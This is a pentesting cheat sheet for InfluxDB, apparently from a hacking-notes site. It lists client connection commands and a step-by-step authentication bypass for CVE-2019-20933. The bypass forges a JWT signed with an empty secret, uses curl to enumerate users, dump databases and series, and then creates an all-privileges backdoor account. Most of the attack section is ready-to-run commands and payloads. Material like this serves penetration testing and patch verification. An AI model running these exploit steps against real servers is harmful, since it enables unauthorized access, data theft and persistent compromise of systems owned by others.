InfluxDB Pentesting

InfluxDB is a time series database written in Go. A default port is 8086.

- https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933

Enumeration

# User enumeration
curl http://<target-ip>:8086/debug/requests


Connect

influx -host 10.0.0.1 -port 8086
influx -host 10.0.0.1 -port 8086 -database <database>
influx -host 10.0.0.1 -port 8086 -username <username>  -password <password>

# Import db file
influx -path example.db


Authentication Bypass (CVE-2019-20933) version ≤ 1.7.6

Automation

https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933

Manual

Reference: https://www.komodosec.com/post/when-all-else-fails-find-a-0-day

Firse find the username.

curl http://<target-ip>:8086/debug/requests

Then create a JWT using the name we found in jwt.io.
Parameters are below:

Header:

{ “sub”: “123456789”, "alg": "HS256", "typ": "JWT" }

Payload:

{ "username": "**<username>**",  "exp":21548669066 }

Verify Signature:

HMACSHA256(base64UrlEncode(header) + "." +base64UrlEncode(payload),<e**mpty>**)

Copy the generated JWT.
Now we can query the InfluxDB API.

INFLUXDB_JWT="<JWT>"
# List databases
curl http://<target-ip>:8086/query -H "Authorization: Bearer $INFLUXDB_JWT" --data-urlencode 'q=SHOW DATABASES' | jq
# List seriest in the database
curl http://<target-ip>:8086/query -H "Authorization: Bearer $INFLUXDB_JWT" --data-urlencode 'db=<database>' --data-urlencode 'q=SHOW SERIES' | jq
# Get values in the series
curl http://<target-ip>:8086/query -H "Authorization: Bearer $INFLUXDB_JWT" --data-urlencode 'db=<database>' --data-urlencode 'q=SELECT * FROM <series>' | jq

# Create a privileged account
curl http://<target-ip>:8086/query -H "Authorization: Bearer $INFLUXDB_JWT" --data-urlencode "q=CREATE USER tester with PASSWORD 'password' with ALL PRIVILEGES"


Commands

# Show command history
> history
# Show settings
> settings

# List databases
> show databases
# Show series information
> show series
# Show measurement information
> show measurements
# Show tag key information
> show tag keys
# Show field key information
> show field keys

# Switch to the database
> use <database>
# Query in the database
> select * from <series>